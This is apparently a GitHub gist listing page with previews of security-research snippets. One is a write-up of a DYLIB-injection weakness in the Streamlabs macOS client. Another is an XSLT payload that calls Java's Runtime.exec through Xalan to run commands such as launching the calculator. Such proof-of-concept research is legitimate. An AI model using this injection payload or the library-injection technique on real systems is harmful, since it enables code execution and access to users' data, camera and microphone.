Support:
- Getting domain info
mpgn
/ Blackfield vs NetExec .md
Last active
April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.
We can see the wrong permissions with running the codesign utility:
csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
thanatoskira
/ select.xslt
Last active
January 16, 2025 06:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template> | |
| <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
| <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
| <!-- #114 Utf8: open -a calculator --> | |
| <!-- #115 String: touch /tmp/pwn --> | |
| <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
| <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
| <!-- #132 Utf8: <init> --> | |
| <AAA select="<init>"/> |
OlderNewer